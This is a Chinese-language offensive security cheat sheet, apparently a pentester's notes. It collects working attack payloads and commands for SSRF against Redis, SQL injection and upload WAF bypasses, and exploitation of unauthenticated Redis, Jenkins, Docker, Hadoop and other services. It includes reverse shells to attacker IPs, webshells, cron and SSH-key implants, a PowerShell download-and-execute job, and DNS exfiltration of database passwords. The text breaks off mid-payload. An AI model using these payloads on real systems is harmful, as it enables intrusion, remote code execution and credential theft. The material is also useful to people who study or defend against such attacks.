dict:查看端口,操作内网服务 gopher:可发出get/post请求 使用gopher协议时,要进行两次url编码 http/https:探测存活主机 dict协议写shell ?url=dict://127.0.0.1:6379/set:x:<?php phpinfo();?> ?url=dict://127.0.0.1:6379/config:set:dir:/www/wwwroot/ ?url=dict://127.0.0.1:6379/config:set:dbfilename:php.php ?url=dict://127.0.0.1:6379/save Unicode编码 ?url=dict://127.0.0.1:6379/set:x:"\x3C\x3Fphp\x20echo `$_GET[x]`\x3B\x3F\x3E" slaveof复制shell到目标 From:http://r3start.net/index.php/2020/05/09/683 你的redis设置一个shell的键 Yourredis>FLUSHALL Yourredis>set shell "<?php phpinfo();?>" ?url=dict://127.0.0.1:6379/slaveof:yourredisIP:6379 ?url=dict://127.0.0.1:6379/config:set:dir:/www/wwwroot/ ?url=dict://127.0.0.1:6379/config:set:dbfilename:test.php ?url=dict://127.0.0.1:6379/save ?url=dict://127.0.0.1:6379/slaveof:no:one slaveof反弹shell ?url=dict://127.0.0.1:6379/slaveof: yourredisIP:6379 ?url=dict://127.0.0.1:6379/config:set:dbfilename:exp.so ?url=dict://127.0.0.1:6379/MODULE:LOAD:./exp.so ?url=dict://127.0.0.1:6379/SLAVEOF:NO:ONE ?url=dict://127.0.0.1:6379/config:set:dbfilename:dump.rdb ?url=dict://127.0.0.1:6379/system.exec:'curl x.x.x.x/x' ?url=dict://127.0.0.1:6379/system.rev:x.x.x.x:8887 Fuzz/扫描web #dirb http://192.168.0.1 /root/asp.txt,/root/dir.txt -a "USER-AGENT" –c "Cookie" -z 100 #nikto -C all -h http://192.168.0.107 nikto扫描web服务 #wpscan --url http://192.168.0.107/ -e u --wordlist /root/wordlist.txt 枚举用户爆破密码 #wpscan --url http://192.168.0.107/ -e vp 扫描漏洞插件 #perl joomscan.pl --url 192.168.0.107 WFuzz 爆破文件和文件夹 >wfuzz -w wordlist URL/FUZZ.php >wfuzz -w wordlist URL/FUZZ 枚举数字参数 >wfuzz -z range,000-999 -b session=session -b cookie=cookie http://127.0.0.1/getuser.php?uid=FUZZ POST账号密码爆破FUZnZ >wfuzz -w userList -w pwdList -d "username=FUZZ&password=FUZ2Z" http://127.0.0.1/login.php 随机HTTP头 >wfuzz -z range,0000-9999 -H "X-Forwarded-For: FUZZ" http://127.0.0.1/get.php?userid=666 使用代理fuzz >wfuzz -w wordlist -p 127.0.0.1:1087:SOCKS5 URL/FUZZ 基础认证爆破 >wfuzz -z list,"username-password" --basic FUZZ:FUZZ URL 【结果过滤】--hc或--ss不显示符合条件的结果。 【结果过滤】--sc或--sl或--sw或--sh显示符合条件的结果。 Cewl 爬行网站存为字典 >cewl http://www.qq.com/ -w dict.txt 指定字典长度 >cewl http://www.qq.com/ -m 9 -w dict.txt 网站提取Email >cewl http://www.qq.com/ -n –e Dirsearch >python3 dirsearch.py --random-user-agents --recursive --thread 50 --extension php --plain-text-report report.txt –url http://127.0.0.1 ![]() Bypass WAF SQL注入分块传输 https://github.com/c0ny1/chunked-coding-converter image image 跑注入点被拦截 image 使用分块传输,右键选择 image image 使用SQLMAP跑注入 image image >python sqlmap.py -r 1.txt --batch --proxy=http://127.0.0.1:8080 --dbs image 自动提供可用的tamper https://github.com/m4ll0k/Atlas GET类型的注入 python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v POST类型的注入 python atlas.py --url http://site.com/index/id/ -m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v 请求头注入 python atlas.py --url http://site.com/index/id/ -H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v 组合tamper python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --random-agent -v 列出tamper python atlas.py -g 例子 注入 python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 image 可以看到被拦截了 查找能绕过的tamper python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v image 根据返回码200得到一个可绕过waf的tamper versionedkeywords这个tamper 继续注入 python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords 根据状态码来判断有时会有点鸡肋,但是也能用用,随机发挥吧。 垃圾数据 #coding=utf-8 import random,string from urllib import parse # code by yzddMr6 varname_min = 5 varname_max = 15 data_min = 20 data_max = 25 num_min = 50 num_max = 100 def randstr(length): str_list = [random.choice(string.ascii_letters) for i in range(length)] random_str = ''.join(str_list) return random_str def main(): data={} for i in range(num_min,num_max): data[randstr(random.randint(varname_min,varname_max))]=randstr(random.randint(data_min,data_max)) print('&'+parse.urlencode(data)+'&') main() 放到要注入的字段前后 上传bypass 图片文件头 PNG 的文件头为十六进制的 89 50 4E 47 0D 0A 1A 0A GIF 为 47 49 46 38 37 61 JPG 为 FF D8 FF E0 添加图片头或合并图片包含 后缀大小写 文件名前缀加[0x09] 上传.htaccess SetHandler application/x-httpd-php 二次渲染 GIF 找好一个大一点的GIF,尾部使用c32插入shell,上传,下载回来,使用burp的comparer功能找出整个文件没有被渲染的位置,插入shell再上传 JPG 使用脚本直接生成 https://github.com/BlackFan/jpg_payload PNG 使用脚本直接生成 先取消php.ini注释;extension=php_gd2.dll <?php $p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23, 0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae, 0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc, 0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f, 0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c, 0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d, 0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1, 0x66, 0x44, 0x50, 0x33); $img = imagecreatetruecolor(32, 32); for ($y = 0; $y < sizeof($p); $y += 3) { $r = $p[$y]; $g = $p[$y+1]; $b = $p[$y+2]; $color = imagecolorallocate($img, $r, $g, $b); imagesetpixel($img, round($y / 3), 0, $color); } imagepng($img,'./1.png'); ?> 上传php3,php4,phtml等 文件名后加::$DATA ConTent-Disposition: form-data; name="filepath"; filename="1.asp::$DATA" ConTent-Disposition: form-data; name="filepath"; filename="1.asp::$DATA\0x00\1.asp0x00.jpg" asp . (空格+.) php. .(点+空格+点) 双写phphpp 00截断 Get参数00截断直接添加%00 POST参数00截断修改hex为00 修改一些固定的参数 文件名去掉双引号 加一个filename1的参数 form变量改成f+orm 去掉form-data 在Content-Disposition或form-data;后添加多个空格 引号回车 ConTent-Disposition: form-data; name="filepath"; filename="backlion.asp " Content-Type和ConTent-Disposition调换位置 文件名前缀加空格 filename= "1.asp" name前加空格 Content-Disposition: form-data; name="uploaded"; filename="1.asp" form-data的前后加上+ Content-Disposition: +form-data; name="filepath"; filename="1.asp" ASP+IIS s%elect>select s%u0065lect>select s%u00f0lect>select s%u0045lect = s%u0065lect = %u00f0lect u -->%u0055 --> %u0075 n -->%u004e --> %u006e i -->%u0049 --> %u0069 o -->%u004f --> %u006f -->%u00ba s -->%u0053 --> %u0073 l -->%u004c --> %u006c e -->%u0045 --> %u0065-->%u00f0 c -->%u0043 --> %u0063 t -->%u0054 -->%u0074 -->%u00de -->%u00fe f -->%u0046 -->%u0066 r -->%u0052 -->%u0072 m -->%u004d -->%u006d Asp+iis&aspx+iis s%u006c%u0006ect>select apache TEST /sql.php?id=1 HTTP/1.1 大小写/关键字 UniOn SeLECT Mid()substring() substr() Hex()ascii() sleep() =benchmark() concat_ws()=group_concat() 双重url编码 变换请求方式 HPP参数污染 id=1&id=2&id=3 得到的结果:Asp.net + iis:id=1,2,3 Asp+iis:id=1,2,3 Php+apache:id=3 MSSQL: GET+POST: GET:http://192.168.125.140/test/sql.aspx?id=1 union/* post: id=2*/select null,null,null 无逗号形式: ?id=1 union select 1&id=2&id=3&id=4 from admin--() 利用逗号: ?a=1+union/*&b=*/select+1,pass/*&c=*/from+users-- 无效参数形式: ?a=/*&sql=xxx&b=*/ a,b为无效参数 溢出形式:?id=1/*&id=*//*&id=*//*......&id=*//*&id=*/ union select null,system_user,null from INFORMATION_SCHEMA.schemata MYSQL: ?id=1&id=1&id=1&id=1&id=1&id=1&id=1&id=….. &id=1 union select 1,2 from admin 数据库 Access 空格符 %09、%0a、%0c、%0d、%16 Mysql 注释符 #、/*...*/、--[空格] ... 空格符 [0x09,0x0a-0x0d,0x20,0xa0] 特殊符号 %a 换行符,可结合注释符使用%23%0a,%2d%2d%0a。 %21 ! 叹号 %2b + 加号 %2d - 减号 %40 @ 符号 %7e ~ 波浪号 Id=1 union select(1),user() Id=1 union /!12345select/1,user() Id=1 union select@1,user() Id=1 union select {x 1},user() Id=1 union select"1",user() Id=1 union select\N,user() Id=1 union select 1,user()` Id=1 union select 1,user()"" Id=1 union select 1,user()A Id=1 union select 1,user()`b Id=1 union(select 1,(select/!schema_name/from information_schema.SCHEMATA limit 1,1)) Id=1 union(select 1,(select{x schema_name}from information_schema.SCHEMATA limit 1,1)) Id=1 union(select 1,(select(schema_name)from information_schema.SCHEMATA limit 1,1)) 浮点数 Id= 1.0union select 1,user() Id= 1.union select 1,user() Id= 1E0union select 1,user() Id=\Nunion select 1,user() Id=1 unionselect user(),2.0from admin Id=1 union select user(),8e0from admin Id=1 union select user(),\Nfrom admin 内联注释 /*!UnIon12345SelEcT*/ 1,user() //数字范围 1000-50540 mysql黑魔法 select{x username}from {x11 test.admin}; 函数 截取 Mid(version(),1,1) Substr(version(),1,1) Substring(version(),1,1) Lpad(version(),1,1) Rpad(version(),1,1) Left(version(),1) reverse(right(reverse(version()),1)) 连接 concat(version(),'|',user()); concat_ws('|',1,2,3) 字符转换 Ascii() Char() Hex() Unhex() 过滤逗号 127' UNION SELECT * FROM ((SELECT1)a JOIN (SELECT2)b JOIN (SELECT3)c JOIN (SELECT4)d JOIN (SELECT5)e)# 相当于 union select 1,2,3,4,5 union select * from (select 1)a join(select{x schema_name} from information_schema.SCHEMATA limit 1,1)b limit 1 offset 0相当于limit 1,0 mid(version() from 1 for 1)相当于Mid(version(),1,1) <>被过滤 id=1 and ascii(substr(database(),0,1))>64 比较符 greatest(n1,n2,n3,等)函数返回输入参数(n1,n2,n3,等)的最大值 id=1 and greatest(ascii(substr(database(),0,1)),64)=64 函数构造 sleep(5)/benchmark(10000000,SHA1(1)) id=1 xor sleep%23%0a(5) id=1 xor sleep%2d%2d%0a(5) id=1 xor sleep([%20]5) id=1 xor benchmark%0a(10000000,SHA1(1)) id=1 xor sleep[空白字符](5) select{x[可填充字符]1} MSSQL 注释符 /*、--、;00%、/**/ 空格符 [0x01-0x20][0x0a-0x0f][0x1a-0x-1f] 特殊符号 %3a 冒号 id=1 union:select 1,2 from:admin id=1 union select+1,'2',db_name() from admin id=1 union select-1,'2',db_name() from admin id=1 union select.1,'2',db_name() from admin id=1 union select:1,'2',db_name() from admin id=1 union select~1,'2',db_name() from admin id=1%20union%20select%201,'2',db_name()%80from%20admin id=1 union select 1,'2',db_name+() from admin 函数变形: db_name[空白字符]() 浮点数 id=1.1union select 1,'2',db_name() id=1e0union select 1,'2',db_name() 运算符 id=1-1union select '1',system_user,3 from admin id=1e-union select '1',system_user,3 from admin 字符串截取函数 Substring(@@version,1,1) Left(@@version,1) Right(@@version,1) charindex('test',db_name()) 字符串转换函数 Ascii('a')=char(97) 括号之间可添加空格 WAF 同时提交GET和POST 访问HTTP绕过对HTTPS的防护 %00截断 参数填充垃圾数据,缓冲区溢出 X-FORWARDED-FOR伪造绕过 静态文件/sql.php/1.js?id=1绕过 白名单绕过,URL只要存在某字符就不会拦截 /sql.php/admin.php?id=1 /sql.php?a=/manage/&b=../etc/passwd /../../../manage/../sql.asp?id=2 伪造User-agent绕过,可改为爬虫agent 未授权访问 Redis未授权访问 测试 >redis-cli -h 127.0.0.1 flunshall 192.168.0.110:6379>ping PONG 存在未授权访问 JS打内网 var cmd = new XMLHttpRequest(); cmd.open("POST", "http://127.0.0.1:6379"); cmd.send('flushall\r\n'); var cmd =new XMLHttpRequest(); cmd.open("POST", "http://127.0.0.1:6379"); cmd.send('eval \'' + 'redis.call(\"set\",\"1\",\"\\n\\n*/1 * * * * /bin/bash -i >&/dev/tcp/外网IP/5566 0>&1\\n\\n");redis.call(\"config\", \"set\", \"dir\",\"/var/spool/cron/\"); redis.call(\"config\",\"set\", \"dbfilename\", \"root\");' + '\' 0' +"\r\n"); var cmd =new XMLHttpRequest(); cmd.open("POST", "http://127.0.0.1:6379"); cmd.send('save\r\n'); 反弹shell 保存为sh echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.0.108/12138 0>&1\n\n"|redis-cli -h $1 -p $2 -x set 1 echo -e "\n\n */1 * * * * python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.108",12138));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'\n\n"|redis-cli -h $1 -p $2 -x set 1 redis-cli -h $1 -p $2 config set dir /var/spool/cron/ redis-cli -h $1 -p $2 config set dbfilename root redis-cli -h $1 -p $2 save redis-cli -h $1 -p $2 quit 执行 >bash 1.sh 192.168.0.120 6379 image image 写shell 6379> config set dir /var/www/html/ 6379> config set dbfilename shell.php 6379> set x "<?php phpinfo();?>" 6379> save SSH ssh-keygen 本地生成一对密钥 https://github.com/JoyChou93/hackredis >ssh-keygen -t rsa -C "xx@xx.com" >(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > qq.txt >redis-cli -h 127.0.0.1 flunshall >cat qq.txt | redis-cli -h 127.0.0.1 -x set crackit >redis-cli -h 127.0.0.1 6379> config set dir /root/.ssh/ 6379> config set dbfilename "authorized_keys" 6379> save 本地登录 #ssh -i id_rsa root@11.11.11.11 redis-rogue-getshell https://github.com/vulhub/redis-rogue-getshell 需要python3.0以上 编译 >cd RedisModulesSDK/ >make 会在此目录下生成exp.so 执行命令 >python3 redis-master.py -r 192.168.0.120 -p 6379 -L 192.168.0.108 -P 12138 -f RedisModulesSDK/exp.so -c "cat /etc/passwd" image redis-rogue-server https://github.com/n0b0dyCN/redis-rogue-server 需要python3.6以上 编译 >cd RedisModulesSDK/exp >make 执行 >./redis-rogue-server.py --rhost 192.168.0.120 --lhost 192.168.0.108 image image 也可以反向shell image image redis在windows下的利用 Web目录写入木马 启动项 系统DLL劫持(目标重启或注销) 特定软件的DLL劫持 覆盖快捷方式 覆盖配置文件 覆盖sethc等文件 https://github.com/r35tart/RedisWriteFile >python3 rediswritefile.py --rhost=目标IP --rport=6379 --lhost=本机IP --lport=本地端口 --rpath="在目标保存的路径" --rfile="在目标保存的文件" --lfile="本地文件" --auth=redis密码 Lua RCE https://github.com/QAX-A-Team/redis_lua_exploit 修改redis_lua.py里的 host 为目标 IP 执行返回正常,反弹shell >eval "tonumber('/bin/bash -i >& /dev/tcp/192.168.0.108/12345 0>&1', 8)" 0 ![]() Jenkins未授权访问 http://www.qq.com:8080/manage http://www.qq.com:8080/script 执行命令 >println "ifconfig -a".execute().text 反弹shell >println "wget http://your.com/back.py -P /tmp/".execute().text >println "python /tmp/back.py yourIP 8080".execute().text 写shell >println "wget http://your.com/t.txt -o /var/www/html/1.php".execute().text >new File("/var/www/html/1.php").write('<?php @eval($_POST[1]);?>'); >def webshell = '<?php @eval($_POST[1]);?>' >new File("/var/www/html/1.php").write("$webshell"); MongoDB未授权访问 默认端口27017直接连接进行增删改查 连接工具 https://s3.mongobooster.com/download/releasesv5/nosqlbooster4mongo-5.1.12.exe ZooKeeper未授权访问 默认端口2181 获得服务器环境信息 >echo envi|nc 192.168.0.1 2181 连接 >./zkCli.sh -server ip:port 连接工具 https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip Elasticsearch未授权访问 默认端口9200 http://1.1.1.1:9200/_plugin/head/ http://1.1.1.1:9200/_nodes http://1.1.1.1:9200/_river http://1.1.1.1:9200/_plugin/sql/ Memcache未授权访问 默认端口11211 >telnet 1.1.1.1 11211 >nc -vv 1.1.1.1 11211 Hadoop未授权访问 http://192.168.1.1:8088/cluster 本地监听端口 >> 创建Application >> 调用Submit Application API提交 #!/usr/bin/env python import requests target = 'http://192.168.18.129:8088/' lhost = '192.168.18.138' # put your local host ip here, and listen at port 9999 url = target + 'ws/v1/cluster/apps/new-application' resp = requests.post(url) app_id = resp.json()['application-id'] url = target + 'ws/v1/cluster/apps' data = { 'application-id': app_id, 'application-name': 'get-shell', 'am-container-spec': { 'commands': { 'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost, }, }, 'application-type': 'YARN', } requests.post(url, json=data) Docker未授权访问 默认端口2375 >docker -H tcp://1.1.1.1:2375 images 本地监听 启动容器 docker -H tcp://1.1.1.1:2375 run -id -v /etc/crontabs:/tmp alpine:latest docker -H tcp://1.1.1.1:2375 ps 进入容器 docker -H tcp://1.1.1.1:2375 exec -it a8ff7ed880fb sh echo '* * * * * /usr/bin/nc {vps_ip} 9999 -e /bin/sh' >> /tmp/root #添加计划任务 cat /tmp/root exit Shipyard默认密码 admin/shipyard ActiveMQ未授权访问 默认端口8161 http://1.1.1.1:8161/admin/connections.jsp PUT /fileserver/%2F%2F2%083.jsp HTTP/1.0 Content-Length: 27 Host: 1.1.1.1:8161 Connection: Close Authorization: Basic YWRtaW46YWRtaW4= 123123123123123123123123123 JBOSS未授权访问 http://192.168.1.1:8080/jmx-console/ 无需认证进入 jboss.deployment部署shell addURL()的paramValue写入远程war木马地址 阿里云OSS Key利用 反编译app文件,查找可能会包含oss key的文件,如JS。 OSSAccessKey、AccessKeySecret使用OSS浏览器访问。 第三方行云管家可修改系统密码。 反弹shell From: https://xz.aliyun.com/t/8310 https://api.aliyun.com/#/?product=Ecs 搜索框搜索选择CreateCommand来创建一个命令 CommandContent填命令的base64,Type填RunShellScript 命令echo "bash -i >& /dev/tcp/你的IP/端口 0>&1"| base64 bash -i >& /dev/tcp/你的IP/端口 0>&1 YmFzaCAtaSAmZ3Q7JiAvZGV2L3RjcC8xLjEuMS4xLzQ0NDQgMCZndDsmMQ== image 填好以后点调试SDK 会直接给你起一个Cloud shell image 并创建一个CreateCommand.py文件,使用vi编辑 image 填accessKeyId,accessSecret保存执行,并记录Commandid image 再次在搜索框搜索InvokeCommand image Commandid填上面请求的返回值,InstanceId填行云管家显示的实例ID image 填好了点调试sdk然后编辑文件把accessKeyId accessSecret填一下,执行 image 然后看监听的服务器shell已经反弹成功 image Linux绕过disable_function LD_PRELOAD linux环境 putenv()、mail()可用 https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD http://192.168.0.107/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so outpath是命令输出位置,sopath指定so文件路径。 或 替换php文件中的mail为error_log("a",1); php7.0-7.3 bypass 直接bypass https://raw.githubusercontent.com/mm0r1/exploits/master/php7-gc-bypass/exploit.php windows系统组件com绕过 <?php $command = $_GET['cmd']; $wsh = new COM('WScript.shell'); // 生成一个COM对象 Shell.Application也能 $exec = $wsh->exec("cmd /c".$command); //调用对象方法来执行命令 $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?> CGI启动方式 phpinfo中搜索server api是cgi或者fastcgi 如果是cgi模式:上传如下htaccess Options ExecCGI AddHandler cgi-script .xx windows平台 #!C:/Windows/System32/cmd.exe /c start calc.exe 1 linux平台 #!/bin/bash echo -ne "Content-Type: text:html\n\n" whoami 如果是fast_cgi,上传如下htaccess Options +ExecCGI AddHandler fcgid-script .abc FcgidWrapper "C:/Windows/System32/cmd.exe /c start cmd.exe" .abc 上传任意文件.abc 相对路径 AddHandler fcgid-script .html FcgidWrapper "../../php/php7.3.4nts/php-cgi.exe" .html AddHandler fcgid-script .xx FcgidWrapper "../../../WWW/localhost/calc.exe" .xx ImageMagick组件绕过 imageMagick 版本 v6.9.3-9 或 v7.0.1-0 第一种 <?php echo "Disable Functions: " . ini_get('disable_functions') . "\n"; $command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd']; if ($command == '') { $command = 'id'; } $exploit = <<<EOF push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|$command")' //核心 pop graphic-context EOF; file_put_contents("KKKK.mvg", $exploit); $thumb = new Imagick(); $thumb->readImage('KKKK.mvg'); $thumb->writeImage('KKKK.png'); $thumb->clear(); $thumb->destroy(); unlink("KKKK.mvg"); unlink("KKKK.png"); ?> 第二种 #include <stdlib.h> #include <string.h> void payload() { const char* cmd = "nc -e /usr/bin/zsh 127.0.0.1 4444"; system(cmd); } int fileno() { if (getenv("LD_PRELOAD") == NULL) { return 0; } unsetenv("LD_PRELOAD"); payload(); } 编译 gcc -shared -fPIC imag.c -o imag.so <?php putenv('LD_PRELOAD=/var/www/html/imag.so'); $img = new Imagick('/tmp/1.ps'); ?> 常规函数绕过 <?php echo exec('whoami');?> ------------------------------------------------------ <?php echo shell_exec('whoami');?> ------------------------------------------------------ <?php system('whoami');?> ------------------------------------------------------ <?php passthru("whoami");?> ------------------------------------------------------ <?php $command=$_POST['cmd']; $handle = popen($command , "r"); while(!feof($handle)) { echo fread($handle, 1024); //fread($handle, 1024); } pclose($handle);?> ------------------------------------------------------- <?php $command="ipconfig"; $descriptorspec = array(1 => array("pipe", "w")); $handle = proc_open($command ,$descriptorspec , $pipes); while(!feof($pipes[1])) { echo fread($pipes[1], 1024); //fgets($pipes[1],1024); }?> pcntl_exec 开启了pcntl 扩展,并且php 4>=4.2.0 , php5,linux <?php if(function_exists('pcntl_exec')) { pcntl_exec("/bin/bash", array("/tmp/test.sh")); } else { echo 'pcntl extension is not support!'; } ?> test.sh #!/bin/bash nc -e /bin/bash 1.1.1.1 8888 #反弹shell imap_open函数 <?php error_reporting(0); if (!function_exists('imap_open')) { die("no imap_open function!"); } $server = "x -oProxyCommand=echo\t" . base64_encode($_GET['cmd'] . ">/tmp/cmd_result") . "|base64\t-d|sh}"; imap_open('{' . $server . ':143/imap}INBOX', '', ''); sleep(5); echo file_get_contents("/tmp/cmd_result"); ?> php7.4 FFI绕过 php 7.4 ffi.enable=true <?php $a='nc -e /bin/bash ip 8888'; $ffi = FFI::cdef( "int system(char *command);", "libc.so.6"); $ffi->system($a); ?> shellshock 存在CVE-2014-6271漏洞 PHP 5.*,linux,putenv()、mail()可用 <?php function shellshock($cmd) { $tmp = tempnam(".","data"); putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"); mail("a@127.0.0.1","","","","-bv"); $output = @file_get_contents($tmp); @unlink($tmp); if($output != "") return $output; else return "No output, or not vuln."; } echo shellshock($_REQUEST["cmd"]); ?> 蚁剑插件 01利用LD_PRELOAD环境变量 02利用ShellShock(CVE-2014-6271) 03利用Apache Mod CGI 04 PHP-FPM利用LD_PRELOAD环境变量(同1) 05攻击PHP-FPM监听端口 06 Json Serializer UAF 07具有特定析构函数UAF的PHP7 GC open_basedir绕过 第一种 http://x.com/shell.php?a=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}; http://x.com/shell.php?a=if%20(%20$b%20=%20opendir(%22glob:///var/www/html/*.php%22)%20)%20{while%20(%20($file%20=%20readdir($b))%20!==%20false%20)%20{echo%20%22filename:%22.$file.%22\n%22;}closedir($b);} 第二种 http://x.com/shell.php?a=ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');system('cat ../../../../../etc/passwd'); http://x.com/shell.php?a=mkdir(%22/tmp/crispr%22);chdir(%27/tmp/crispr/%27);ini_set(%27open_basedir%27,%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);ini_set(%27open_basedir%27,%27/%27);print_r(scandir(%27.%27)) 第三种 命令执行绕过 读文件 ?a=show_source('preload.php'); ?a=echo(readfile('preload.php')); ?a=print_r(readfile('preload.php')); ?a=echo(file_get_contents('preload.php')); ?a=print_r(file_get_contents('preload.php')); Tomcat Ajp LFI&RCE LFI https://github.com/Kit4y/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner >python CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.0.110 -p 8009 -f pass image RCE >msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.107 LPORT=12138 R >/var/www/html/1.jpg 配合目标文件上传传入服务器 image >java -jar ajpfuzzer_v0.6.jar >connect 192.168.0.110 8009 >forwardrequest 2 "HTTP/1.1" "/index.jsp" 192.168.0.107 192.168.0.107 porto 8009 false "Cookie:AAAA=BBBB","Accept-Encoding:identity" "javax.servlet.include.request_uri:index.jsp","javax.servlet.include.path_info:/1.jpg","javax.servlet.include.servlet_path:/" image Mysql连接文件读取 https://github.com/Gifts/Rogue-MySql-Server 客户端必须启用LOCAL-INFILE 客户端支持非SSL连接 目标web存在adminer等可检查数据库连接的脚本。 攻击机本地运行python构造假mysql服务,使用目标web连接,读取文件。 #coding=utf-8 import socket import logging logging.basicConfig(level=logging.DEBUG) filename="/etc/passwd" sv=socket.socket() sv.bind(("",3305)) sv.listen(5) conn,address=sv.accept() logging.info('Conn from: %r', address) conn.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00") conn.recv(9999) logging.info("auth okay") conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00") conn.recv(9999) logging.info("want file...") wantfile=chr(len(filename)+1)+"\x00\x00\x01\xFB"+filename conn.sendall(wantfile) content=conn.recv(9999) logging.info(content) conn.close() Mysql开启外连 >grant all privileges on user.* to user@"%" identified by "P@ssw0rd"; MSSQL&Agent Job上线 USE msdb; EXEC dbo.sp_add_job @job_name = N'syspolicy_purge_now' ; EXEC sp_add_jobstep @job_name = N'syspolicy_purge_now', @step_name = N'syspolicy_purge_step1', @subsystem = N'PowerShell', @command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://IP_OR_HOSTNAME/file''))"', @retry_attempts = 1, @retry_interval = 5 ;EXEC dbo.sp_add_jobserver @job_name = N'syspolicy_purge_now '; EXEC dbo.sp_start_job N'syspolicy_purge_now '; 使用在注入点处,使用burp进行url编码,编码后前面加%20(空格URL编码) 注入无列名 http://url/index.php?id=1 order by 6 http://url/index.php?id=-1 union select 1,(select `4` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1)-- - http://url/index.php?id=-1 union select 1,(select concat(`3`,0x3a,`4`) from (select 1,2,3,4,5,6 union select * from users)a limit 1,1)-- - DNSLog http://ceye.io http://www.dnslog.cn/ 注入 MYSQL 显示数据库 ?id=1' and if((select load_file(concat('\\\\',(select database()),'.jhsefs.ceye.io\\sql_test'))),1,0)--+ 显示数据库 ?id=1' and if((select load_file(concat('\\\\',(select schema_name from information_schema.schemata limit {0},1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+ 显示表 ?id=1' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='dbname' limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+ ?id=1' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=0x1x1x2x limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+ 显示字段 ?id=1' and if((select load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='users' limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+ 显示数据 ?id=1' and if((select load_file(concat('\\\\',(select hex(user) from users limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+ MSSQL 查数据 ?id=1;DECLARE @host varchar(1024);SELECT @host=(SELECT master.dbo.fn_varbintohexstr(convert(varbinary,rtrim(pass))) FROM test.dbo.test_user where [USER] = 'admin')%2b'.cece.nk40ci.ceye.io';EXEC('master..xp_dirtree "\'%2b@host%2b'\foobar$"'); Sa密码 ?id=1DECLARE @host varchar(1024);SELECT @host=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash)FROM sys.sql_loginsWHERE name='sa')+'.ip.port.b182oj.ceye.io';EXEC('master..xp_dirtree"\'+@host+'\foobar$"'); 执行命令 exec master..xp_cmdshell "whoami>D:/temp%26%26certutil -encode D:/temp D:/temp2%26%26findstr /L /V ""CERTIFICATE"" D:/temp2>D:/temp3"; exec master..xp_cmdshell "cmd /v /c""set /p MYVAR=< D:/temp3 %26%26 set FINAL=!MYVAR!.xxx.ceye.io %26%26 ping !FINAL!"""; exec master..xp_cmdshell "del ""D:/temp"" ""D:/temp2"" ""D:/temp3"""; postgreSQL ?id=1;DROP TABLE IF EXISTS table_output;CREATE TABLE table_output(content text);CREATE OR REPLACE FUNCTION temp_function() RETURNS VOID AS $$ DECLARE exec_cmd TEXT;DECLARE query_result TEXT;BEGIN SELECT INTO query_result (select encode(pass::bytea,'hex') from test_user where id =1);exec_cmd := E'COPY table_output(content) FROM 